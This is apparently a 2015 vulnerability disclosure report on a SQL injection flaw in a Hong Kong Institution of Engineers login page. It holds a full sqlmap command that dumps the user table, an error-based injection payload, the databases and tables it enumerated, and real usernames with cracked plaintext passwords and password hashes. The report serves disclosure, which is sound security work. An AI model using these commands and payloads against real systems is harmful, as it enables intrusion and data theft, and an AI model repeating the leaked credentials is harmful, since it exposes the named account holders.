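2015-10-12: Details reported to the vendor; awaiting vendor response
2015-10-15: Vendor confirmed; details disclosed to the vendor only
2015-10-25: Details disclosed to core white hats and relevant domain experts
2015-11-04: Details disclosed to regular white hats
2015-11-14: Details disclosed to intern white hats
2015-11-29: Details disclosed to the public
The Hong Kong Institution of Engineers: SQL injection vulnerability plus weak back-end passwords (132 databases)
Tested with sqlmap. Test URL: http://**.**.**.**/login.aspx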
python sqlmap.py -u "http://**.**.**.**/login.aspx" --form --batch -p UsrID --technique=E -D HKIE_AC -T tb_Usr -C Usr_name,Usr_pwd --dump
Weak passwords:
1. jimmy:00000000
2. W C LO:drwclo
---
Parameter: UsrID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUJNzc3OTI0NjM5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIYnRubG9naW79t+jTuJcfBVV7mqLjckooBfnAsg==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQK7643hCAL1sK+0CwLmmdGVDALIvNOaAQKC3IfLCZn65Pt3vL2j2d/jloghC1RnzTlm&UsrID=nSUi' AND 7221=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7221=7221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(113))) AND 'RNLY'='RNLY&Pwd=&Organizer=RWwO&btnlogin.x=1&btnlogin.y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [132]:
Database: HKIE_AC
[16 tables]
+-----------------------+
| tb_DocUpload          |
| tb_Event              |
| tb_EventGroupType     |
| tb_LeftMenu           |
| tb_LeftSubMenu        |
| tb_News               |
| tb_PageContent        |
| tb_PageContentSetting |
| tb_PastSession        |
| tb_PastSessionType    |
| tb_Photo              |
| tb_PhotoAlbum         |
| tb_S_Doc              |
| tb_S_DocType          |
| tb_Usr                |
| tb_event_reply_from   |
+-----------------------+
Table: tb_Usr
[10 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Crt_by     | varchar  |
| Crt_dte    | datetime |
| Email_adds | varchar  |
| Is_Enable  | char     |
| Staff_name | varchar  |
| Tel        | varchar  |
| Update_by  | varchar  |
| Update_dte | datetime |
| Usr_name   | varchar  |
| Usr_pwd    | varchar  |
+------------+----------+
Table: tb_Usr
[3 entries]
+----------+--------------------------+
| Usr_name | Usr_pwd                  |
+----------+--------------------------+
| jimmy    | 3Ush6e9x4SkRg6RrkTrm8g== |
| W C LO   | CJgGly+9rN5dcsNjmlEeJw== |
| admin    | H0SAi4swyo2o6p1FTf1U+w== |
+----------+--------------------------+
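Add filtering.
Severity: High
Vulnerability Rank: 14
Confirmation time: 2015-10-15 17:42
The relevant organization has been contacted to handle this.
None at this time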